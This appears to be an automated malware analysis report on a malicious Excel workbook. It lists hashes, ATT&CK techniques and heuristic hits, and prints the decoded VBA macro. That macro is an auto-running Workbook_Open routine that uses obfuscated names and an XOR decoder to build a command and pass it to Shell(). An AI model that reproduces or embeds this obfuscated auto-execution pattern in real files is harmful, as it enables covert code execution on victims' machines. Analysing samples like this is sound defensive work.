Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd59749229dd9b0d…

MALICIOUS

Office (OLE)

Size: 172.5 KB | Created: 2020-03-12 00:16:19 | Authoring application: Microsoft Excel | First seen: 2020-07-24
MD5: 830f58b71a4923027a18c591c8228cd6
SHA-1: 60ae6dba3eaab1abd9465f214e3a60be7a98d504
SHA-256: fd59749229dd9b0d1ccfca05e59f5b79b74aa765e629bb018724d87fb8b52c61
162 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file contains VBA macros, specifically a Workbook_Open event handler that runs automatically when the workbook is opened and ends in a Shell() call. This indicates an attempt to execute arbitrary code, likely to download and run a second-stage payload. The reconstructed command string suggests persistence via a Run key entry.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3113 bytes
SHA-256: d838e34ffe45e6a763d5028de4ca06d246aacc2fdd12880328450e2dcf679025
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim ½´Ÿ§Dyà»Oª¾„ÇÈmm••…¼¹ñ×–¼±·î¹ŸXÂàø™·±˜…î·–±¤ìœìäNZN¾°±™ As String
Dim ä§Ã…à¶½…·ìâ´¾y¹Å–œ••¶˜¶€Ì¹¬†YÑà½NX¹îàä±§ÃÈî¹Ä±•‘§¬D½ñ• As String
Dim ±YO·Ç•¼™™Zà³ø×ÄwäD¼ZB±´™ÌDÂàp¨Ÿñ•··…¾O¹îà¹y¹·Z…±…½œ·wŸä As String
Dim •´…•¹m‚È•­ñoiœ¥øG•½¹ÇÕ§‘……Õ¼•½ŸÄ™·€…–´·B¶îÄA‚Z•ñس‚»ñÇ As String
Dim cc As String
Dim ·àNâò½½äñ¹Y½ñ•ñO´™¹øé–±à·ŸÕœ…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ As String
·àNâò½½äñ¹Y½ñ•ñO´™¹øé–±à·ŸÕœ…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ = (·àNâò½½äñ¹Y½ñ•ñO´™¹øé–±à·ŸÕœ…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾ + (Replace(a(a("g", "262626" + ä§Ã…à¶½…·ìâ´¾y¹Å–œ••¶˜¶€Ì¹¬†YÑà½NX¹îàä±§ÃÈî¹Ä±•‘§¬D½ñ•), "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"), " FFGGFFGG " + cc, "")))
Shell (·àNâò½½äñ¹Y½ñ•ñO´™¹øé–±à·ŸÕœ…¾±p•Äà™½N½Zä·ì•½§Z½™¹¾YºŸ¾)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True